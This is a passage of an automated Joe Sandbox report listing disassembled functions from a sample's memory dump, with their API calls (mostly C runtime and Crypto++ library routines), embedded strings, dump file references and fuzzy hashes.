                                                                                                        • Part of subcall function 00EB1C5C: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00EB1C8B,00EAE98D,00000000,?,00EA552F,00000000,00000010,00000000,00000000), ref: 00EB1C6F
                                                                                                      • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,00EAE9A7,00000000,00000001,00000000,00000000,?,00EA552F,00000000,00000010,00000000,00000000), ref: 00EB1CF9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                      • String ID:
                                                                                                      • API String ID: 2744216297-0
                                                                                                      • Opcode ID: 944f6dc7e9b193e27b8eb35ae7c43d4944ceecdf5c81c4a1750951b33a657374
                                                                                                      • Instruction ID: 42076f552472b04f0bfeccb1c9032338956eaf6fe35059aecc23deb2cf251d5b
                                                                                                      • Opcode Fuzzy Hash: 944f6dc7e9b193e27b8eb35ae7c43d4944ceecdf5c81c4a1750951b33a657374
                                                                                                      • Instruction Fuzzy Hash: DAF01C36400119FFCF322F92DC289DB7F66EB483B1B408155FA19B5121C7B2C820DB91
                                                                                                      APIs
                                                                                                      • _free.LIBCMT ref: 00EA1618
                                                                                                        • Part of subcall function 00EA4646: RtlFreeHeap.NTDLL(00000000,00000000,?,00EA1489), ref: 00EA465C
                                                                                                        • Part of subcall function 00EA4646: GetLastError.KERNEL32(?,?,00EA1489), ref: 00EA466E
                                                                                                      • _free.LIBCMT ref: 00EA162B
                                                                                                      • _free.LIBCMT ref: 00EA163C
                                                                                                      • _free.LIBCMT ref: 00EA164D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 776569668-0
                                                                                                      • Opcode ID: 729b6c065977c17e03ca1433d0dce58e1665c5e3799eef571a6c3fe8e4dbe1de
                                                                                                      • Instruction ID: f6f018a25a3cab259d2ea33e124195d991565278c6064be550b9cc62f03cea09
                                                                                                      • Opcode Fuzzy Hash: 729b6c065977c17e03ca1433d0dce58e1665c5e3799eef571a6c3fe8e4dbe1de
                                                                                                      • Instruction Fuzzy Hash: AFE0BFB580C1AC9E8A21BF17BDC54853A62F7CA7443015216F4043F671D776161A9FC9
                                                                                                      APIs
                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00E52132
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___std_exception_copy
                                                                                                      • String ID: is not a valid key length$^
                                                                                                      • API String ID: 2659868963-1126833065
                                                                                                      • Opcode ID: 6ebc706ada398bdaf295b0085caa27a8d7838ec4d203dbb73b79122d13a6317e
                                                                                                      • Instruction ID: 6258828e11f7ae2088bb8a7caa48189dee4f00568e99d360202699eaa8e6e5e5
                                                                                                      • Opcode Fuzzy Hash: 6ebc706ada398bdaf295b0085caa27a8d7838ec4d203dbb73b79122d13a6317e
                                                                                                      • Instruction Fuzzy Hash: 0971E471A012089BDB18DF68CC41B9EFBB5EF86310F20861EE815B72D1E7B1A984CB50
                                                                                                      APIs
                                                                                                      • __startOneArgErrorHandling.LIBCMT ref: 00EA02AD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorHandling__start
                                                                                                      • String ID: pow
                                                                                                      • API String ID: 3213639722-2276729525
                                                                                                      • Opcode ID: 9408378e3268c1f933c4f38663a5b0e659fa24f51da7c29705b2385d1c59faa3
                                                                                                      • Instruction ID: a54edf4517e6324b9b5c1c62d2f9f69a477f8470d0dc74d8a8aecd030c3db50a
                                                                                                      • Opcode Fuzzy Hash: 9408378e3268c1f933c4f38663a5b0e659fa24f51da7c29705b2385d1c59faa3
                                                                                                      • Instruction Fuzzy Hash: 14518A60D043018BCB117714C9053BA3BD0AB4B754F2CAD79F0917E1BADB35AC99DA47
                                                                                                      APIs
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EA73F2
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EA7405
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                      • String ID: ,r
                                                                                                      • API String ID: 885266447-1997977556
                                                                                                      • Opcode ID: 9fd098a62717cd2753dd73dc36b4a6c3fb166c3707e02298af9f56955ee7e031
                                                                                                      • Instruction ID: d409bb43738d2feb36c0ecab672572353c4277b4fa0fcbff3028d645e2430be8
                                                                                                      • Opcode Fuzzy Hash: 9fd098a62717cd2753dd73dc36b4a6c3fb166c3707e02298af9f56955ee7e031
                                                                                                      • Instruction Fuzzy Hash: F5516971A04109AFCF18CF98CC81AAEBBF6EF89314F199159F895BB351D231AE44DB50
                                                                                                      APIs
                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00E358C2
                                                                                                      Strings
                                                                                                      • CryptoMaterial: this object contains invalid values, xrefs: 00E357E7
                                                                                                      • CryptoMaterial: this object does not support precomputation, xrefs: 00E35845
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___std_exception_copy
                                                                                                      • String ID: CryptoMaterial: this object contains invalid values$CryptoMaterial: this object does not support precomputation
                                                                                                      • API String ID: 2659868963-3364311089
                                                                                                      • Opcode ID: 4bff7f1d71c18fe2358776b83f0904e4f6005919c47c16c223ea776ff2336f2f
                                                                                                      • Instruction ID: 17d03527a18e2f0c5240d132f6a4d3513529408382cb8f6ac4e8aee19a96ecbe
                                                                                                      • Opcode Fuzzy Hash: 4bff7f1d71c18fe2358776b83f0904e4f6005919c47c16c223ea776ff2336f2f
                                                                                                      • Instruction Fuzzy Hash: D7417FB1900648EBC701DFA5D941FDAF7FCEB19710F10466AF825B7690EB74AA04CB50
                                                                                                      APIs
                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00E51D92
                                                                                                      Strings
                                                                                                      • Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 00E51CE4
                                                                                                      • Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 00E51D12
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___std_exception_copy
                                                                                                      • String ID: Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.
                                                                                                      • API String ID: 2659868963-3345525433
                                                                                                      • Opcode ID: 28f70939701a44c466336821a0f75ba3a8a25359a3e636ba5b711b3a76d87157
                                                                                                      • Instruction ID: 2f9823ef8c8345ed72dacd8abfea4cc5e4ab320b6b6719f25834ec7a830a3c2f
                                                                                                      • Opcode Fuzzy Hash: 28f70939701a44c466336821a0f75ba3a8a25359a3e636ba5b711b3a76d87157
                                                                                                      • Instruction Fuzzy Hash: A341A371944608ABCB14EF94C841BDEF7F8FF05720F10566AE815B3251EBB5A504CB50
                                                                                                      APIs
                                                                                                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00E9155A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EncodePointer
                                                                                                      • String ID: MOC$RCC
                                                                                                      • API String ID: 2118026453-2084237596
                                                                                                      • Opcode ID: 70c9e6219beac55943e560449e56127faf435b28f5781909f80662e97c3ef986
                                                                                                      • Instruction ID: f022e9072d7db82a171c4afdd81b3406d877d7d9afa4b554266d2381c1f637d9
                                                                                                      • Opcode Fuzzy Hash: 70c9e6219beac55943e560449e56127faf435b28f5781909f80662e97c3ef986
                                                                                                      • Instruction Fuzzy Hash: E741797190020AAFCF15DF94CD81AEEBBB5FF48348F199099F90977252D3359A50DB50
                                                                                                      APIs
                                                                                                        • Part of subcall function 00EAB2DF: _free.LIBCMT ref: 00EAB33F
                                                                                                        • Part of subcall function 00EAAF58: GetOEMCP.KERNEL32(00000000,00EAB1DF,?,00EA0C34,00EEDE9C,00EEDE9C,00EA0C34), ref: 00EAAF83
                                                                                                      • _free.LIBCMT ref: 00EAB23C
                                                                                                      • _free.LIBCMT ref: 00EAB272
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free
                                                                                                      • String ID: xh
                                                                                                      • API String ID: 269201875-2233559332
                                                                                                      • Opcode ID: 5901e13fcc7e8a108a0f0ab61f8c2b97af6777468e69eb6230530149ebc1c82a
                                                                                                      • Instruction ID: 2f799c5aceddd7ca300139ea0c109ee45ca1b480c2238776b72b004420309ce7
                                                                                                      • Opcode Fuzzy Hash: 5901e13fcc7e8a108a0f0ab61f8c2b97af6777468e69eb6230530149ebc1c82a
                                                                                                      • Instruction Fuzzy Hash: 2331B3719002499FCB11DFA9C884B9E7BF4BF4A324F15116AF814AF2A2D732AC54CB60
                                                                                                      APIs
                                                                                                      • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00EAD7E5,00000000,00000050,?,?,?,?,?), ref: 00EAD665
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ACP$OCP
                                                                                                      • API String ID: 0-711371036
                                                                                                      • Opcode ID: cb053902ff5abf975278ad4e8866bda4b3973da7ac195f59b275e7856ed05c01
                                                                                                      • Instruction ID: 322ad28623f62eb64cc69095500d4f4701c5fe5e5e78d2d27ce09dcf15d3c6db
                                                                                                      • Opcode Fuzzy Hash: cb053902ff5abf975278ad4e8866bda4b3973da7ac195f59b275e7856ed05c01
                                                                                                      • Instruction Fuzzy Hash: 47219562A08104E6D7249A548D05B9763A6EFDFB68F569564E90FFF500EB32FD40C290
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free
                                                                                                      • String ID: Hb
                                                                                                      • API String ID: 269201875-1270690246
                                                                                                      • Opcode ID: f5a02197b0bf904a1d46a7d456ef6c0518b8c0f286fa6a2f92aed21272f50b8f
                                                                                                      • Instruction ID: d4c8532de3e403c9d3b1f7901afcd8922ad85583c57be49fd9eaa2f58059efb2
                                                                                                      • Opcode Fuzzy Hash: f5a02197b0bf904a1d46a7d456ef6c0518b8c0f286fa6a2f92aed21272f50b8f
                                                                                                      • Instruction Fuzzy Hash: 8411E671A042444EDF349B29EE81B553294A797738F94262BF511FF6E0DBB0D8454391
                                                                                                      APIs
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00E31EAB
                                                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00E31EFA
                                                                                                        • Part of subcall function 00E8C46F: _Yarn.LIBCPMT ref: 00E8C48E
                                                                                                        • Part of subcall function 00E8C46F: _Yarn.LIBCPMT ref: 00E8C4B2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                      • String ID: bad locale name
                                                                                                      • API String ID: 1908188788-1405518554
                                                                                                      • Opcode ID: 0103ff9ba9e4a9ed783b7a52eab3b3fe2e8b5e080df9de3a3ccd892bdcbfb635
                                                                                                      • Instruction ID: 2a1f48924f9fe77446d49b5a19603e1df7e332ccef429ae759b7d5ca108ca59f
                                                                                                      • Opcode Fuzzy Hash: 0103ff9ba9e4a9ed783b7a52eab3b3fe2e8b5e080df9de3a3ccd892bdcbfb635
                                                                                                      • Instruction Fuzzy Hash: D411E070904B849FD320CF68C801B47BBF4EF19710F004A1EE499D7B81D7B5A604CBA1
                                                                                                      APIs
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00E8C40B
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00E8C466
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                      • String ID: `F
                                                                                                      • API String ID: 593203224-2505862506
                                                                                                      • Opcode ID: d133bc4ee22e547d54edb35645f5f0837a0fac500d6054a3fa27d0fd61ad8088
                                                                                                      • Instruction ID: 43f737a1218f48c61b62d4b15b6c5ec1dd7d98cf4b013ee20c97e57b4a315a78
                                                                                                      • Opcode Fuzzy Hash: d133bc4ee22e547d54edb35645f5f0837a0fac500d6054a3fa27d0fd61ad8088
                                                                                                      • Instruction Fuzzy Hash: 1301B135600604AFCB04EF55CC51E6E7BB8EF85750B2440A9E91DAB361DF70EE41CBA0
                                                                                                      APIs
                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 00EA4E2A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CountCriticalInitializeSectionSpin
                                                                                                      • String ID: InitializeCriticalSectionEx$`F
                                                                                                      • API String ID: 2593887523-1616480788
                                                                                                      • Opcode ID: 4db920e154dd8a7163978122dab95eaaf8cdf80c7b54a7a083dfecc1ad95da7b
                                                                                                      • Instruction ID: b0d8cbf09d84bc1431210b5268e4cc3b05fc2ac575206bc3c79225d886b7d1a4
                                                                                                      • Opcode Fuzzy Hash: 4db920e154dd8a7163978122dab95eaaf8cdf80c7b54a7a083dfecc1ad95da7b
                                                                                                      • Instruction Fuzzy Hash: 95F09071641218BBCB056F51ED02EAF7FA2EF49720F004118F819BA1A1CBB29921AA81
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Free
                                                                                                      • String ID: FlsFree$`F
                                                                                                      • API String ID: 3978063606-2612236785
                                                                                                      • Opcode ID: 756dcb1476155955065e7c01090d3f7473ade86da6a4527f07ae0c17a6917b1a
                                                                                                      • Instruction ID: ba5d05fc9dc11b745d6521ac3a18e65864ae0ccc3f6ab3e868b4ac2d07456a07
                                                                                                      • Opcode Fuzzy Hash: 756dcb1476155955065e7c01090d3f7473ade86da6a4527f07ae0c17a6917b1a
                                                                                                      • Instruction Fuzzy Hash: 7CE055B0A42308AF82007F169C23E3FBB94DB89B10F04015DF8097B291DBA25D0086C1
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
